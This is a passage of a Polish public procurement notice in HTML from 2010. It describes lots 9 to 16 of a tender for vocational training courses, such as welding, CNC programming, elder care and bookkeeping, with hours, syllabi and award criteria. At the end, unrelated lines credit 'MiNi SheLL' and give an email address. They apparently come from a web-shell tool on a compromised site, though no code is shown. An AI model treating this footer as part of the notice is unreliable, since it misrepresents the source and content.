<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Realizacja szkolenia uprawniającego uczestnika do wykonywania zawodu magazynier dla 15 osób.
Szkolenie obejmuje:
- blok zajęć teoretyczno-praktycznych - minimum 130 h dydaktycznych ( w tym do 30% godzin teorii), 
- 1 godzina dydaktyczna = 45 minut,
- elementy gospodarki magazynowej,
- obsługa komputera,
-prowadzenie księgowości materiałowej i obrotu towarowego z wykorzystaniem   
 komputera ( tworzenie kartotek, dokumenty, inwentaryzacja, archiwizacja  
 danych itp.),
- kurs kierowców wózków jezdniowych z napędem silnikowym z wymianą butli  
  gazowej..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.57.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 29.10.2010.</p></li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Realizacja szkolenia zawodowego o profilu masaż z elementami refleksologii.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Realizacja szkolenia masaż z elementami refleksologii 7 osób mającego na celu przygotowanie uczestnika do wykonywania zawodu.
Szkolenie obejmuje:
- blok zajęć teoretyczno-praktycznych - minimum 130 h dydaktycznych  (w tym do 40% godzin teorii), 
- 1 godzina dydaktyczna = 45 minut,
- szkolenie BHP,
- anatomia i fizjologia człowieka,
- wprowadzenie do masażu,
- masaż klasyczny,
- refleksologia dłoni i stóp,
- masaże w kosmetyce,
- masaże klasyczne w kosmetyce,
- masaże dalekiego wschodu, kamieniami rozgrzanymi,
- masaże wspomagające odchudzanie,
- rozwój umiejętności interpersonalnych..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.57.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 29.10.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. Ilość osób za szkolenie na 1 osobę - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Realizacja szkolenia zawodowego o profilu operator maszyn do robót ziemnych - koparkoładowarki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Realizacja szkolenia zawodowego z zakresu operator maszyn do robót ziemnych - koparkoładowarki dla 8 osób, mającego na celu przygotowanie uczestnika do wykonywania zawodu.
Szkolenie obejmuje:  blok zajęć teoretyczno-praktycznych - minimum  176 h dydaktycznych, 
- 1 godzina dydaktyczna = 45 minut,
- użytkowanie eksploatacyjne,
- dokumentacja techniczna,
- BHP,
- podstawy elektrotechniki,
- silniki spalinowe,
- elementy hydrauliki,
- budowa koparko-ładowarek,
- technologia robót,
- zajęcia praktyczne..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.57.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 29.10.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. Ilość osób za szkolenie na 1 osobę - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Realizacja szkolenia zawodowego o profilu operator usług utrzymania czystości.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Realizacja szkolenia zawodowego z zakresu profesjonalnego sprzątania dla 11 osób mającego na celu przygotowanie uczestnika do wykonywania pracy.
Szkolenie obejmuje:
- blok zajęć teoretyczno-praktycznych - minimum 90 h dydaktycznych ( w tym do 40% godzin teorii), 
- 1 godzina dydaktyczna = 45 minut,
- problematyka czystości,
- rodzaje i typy podłóg,
- środki chemiczne, ich rodzaje i zastosowanie,
- podstawowe technologie sprzątania,
- BHP w podstawowych procesach sprzątania..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.57.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 18.10.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. Ilość godzin za szkolenie na 1 osobę - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> Realizacja szkolenia zawodowego o profilu opiekun osób starszych,chorych i niepełnosprawnych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Realizacja szkolenia opiekun osób starszych, chorych i niepełnosprawnych dla 4 osób mającego na celu przygotowanie uczestnika do wykonywania pracy.
Szkolenie obejmuje:
- blok zajęć teoretyczno-praktycznych - minimum 130 h dydaktycznych ( w tym do 30% godzin teorii),  
- 1 godzina dydaktyczna = 45 minut,
- elementy pedagogiki opiekuńczej, psychologii - komunikacja interpersonalna,   
  zagadnienia prawne,
- pielęgnacja i opieka nad osobami starszymi, chorymi lub niepełnosprawnymi (podstawy higieny i pielęgnacji, utrzymanie czystości w otoczeniu podopiecznego, dietetyka, żywienie i przygotowywanie posiłków, pierwsza pomoc przedlekarska, podawanie leków, problemy zdrowotne ludzi starszych, osób przewlekle chorych i niepełnosprawnych, stosowanie wybranych form terapii zajęciowej, wybrane zagadnienia z rehabilitacji, elementy masażu leczniczego, profilaktyka, organizacja czasu wolnego podopiecznych, organizacja pracy własnej oraz zasady BHP, etyka w zawodzie opiekuna)
- zajęcia praktyczne..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.57.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 27.10.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. Ilość godzin za szkolenie na 1 osobę - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 13 <b>NAZWA:</b> Realizacja szkolenia zawodowego o profilu programowanie i obsługa obrabiarek sterowanych numerycznie CNC.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Realizacja szkolenia programowanie i obsługa obrabiarek sterowanych numerycznie CNC dla 1 osoby uprawniającego uczestnika do wykonywania zawodu.
 Szkolenie obejmuje:
- blok zajęć teoretyczno-praktycznych - minimum 180 h dydaktycznych, 
- 1 godzina dydaktyczna = 45 minut
Część teoretyczna: 
- budowa maszyn CNC, 
- podstawy obróbki skrawaniem, 
- struktura programu NC, 
- główne funkcje i adresy CNC, 
- podstawowe funkcje przygotowawcze, pomocnicze, 
- programowanie ISO,
- cykle stałe,
- obróbka z wykorzystaniem narzędzi zmechanizowanych przy użyciu osi C.

Część praktyczna: 
- pisanie programów wybranych detali z wykorzystaniem symulatora, 
- obsługa obrabiarki: rozruch maszyny, zarządzanie programami, 
-uzbrojenie obrabiarki, wprowadzanie korekcji długościowych narzędzi, 
 bazowanie,
- pisanie programów wybranych detali bezpośrednio na obrabiarce, symulacja  
  na maszynie, wykonanie detalu..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.57.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 29.10.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. Ilość godzin za szkolenie na 1 osobę - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 14 <b>NAZWA:</b> Realizacja szkolenia zawodowego o profilu spawanie blach i rur spoinami pachwinowymi metodą MIG oraz spoinami czołowymi metodą MIG.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Realizacja szkolenia spawanie blach i rur spoinami pachwinowymi metodą MIG oraz spoinami czołowymi metodą MIG dla 1 osoby uprawniającego uczestnika do wykonywania zawodu.
Szkolenie obejmuje:
- blok zajęć teoretyczno-praktycznych - minimum 250h dydaktycznych, 
- 1 godzina dydaktyczna = 45 minut,
- zakres tematyczny zgodnie z wytycznymi Instytutu Spawalnictwa w Gliwicach.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.57.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 13.10.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. Ilość osób za szkolenie na 1 osobę - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 15 <b>NAZWA:</b> Realizacja szkolenia zawodowego o profilu sprzedawca z obsługą kas fiskalnych i minimum sanitarne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Realizacja szkolenia uprawniającego uczestnika do wykonywania zawodu sprzedawca z obsługą kasy fiskalnej dla 30 osób.
Szkolenie obejmuje:
- blok zajęć teoretyczno-praktycznych - minimum 120 h dydaktycznych ( w tym do 30% godzin teorii), 
- 1 godzina dydaktyczna = 45 minut, 
- obsługa kasy fiskalnej,
- obsługa kasy systemowej (kasa fiskalna współpracująca z komputerem),
- rozliczenia finansowe,
- minimum sanitarne,
- BHP na stanowisku pracy,
- praca z gotówką,
- techniki sprzedaży i obsługi klienta detalicznego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.57.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 29.10.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. Ilość godzin za szkolenie na 1 osobę - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 16 <b>NAZWA:</b> Realizacja szkolenia zawodowego o profilu uproszczona księgowość, kadry,płace.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Realizacja szkolenia uproszczona księgowość, kadry, płace dla 12 osób mającego na celu przygotowanie uczestnika do wykonywania zawodu.
 Szkolenie obejmuje:
- blok zajęć teoretyczno-praktycznych - 180 h dydaktycznych ( w tym do 60% godzin teorii), 
- 1 godzina dydaktyczna = 45 minut,
- podstawy księgowości
- podstawy rachunkowości i finansów
- rachunek kosztów i rachunkowość zarządcza
- wykorzystanie programu komputerowego Płatnik
- klasyfikacja podstawowych podmiotów gospodarczych, usytuowanie w nich 
  działu kadr i płac
- wybrane zagadnienia z prawa pracy
- kadry
- ubezpieczenia społeczne
- płace
- szkolenie BHP..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.57.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 27.10.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. Ilość godzin za szkolenie na 1 osobę - 30</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com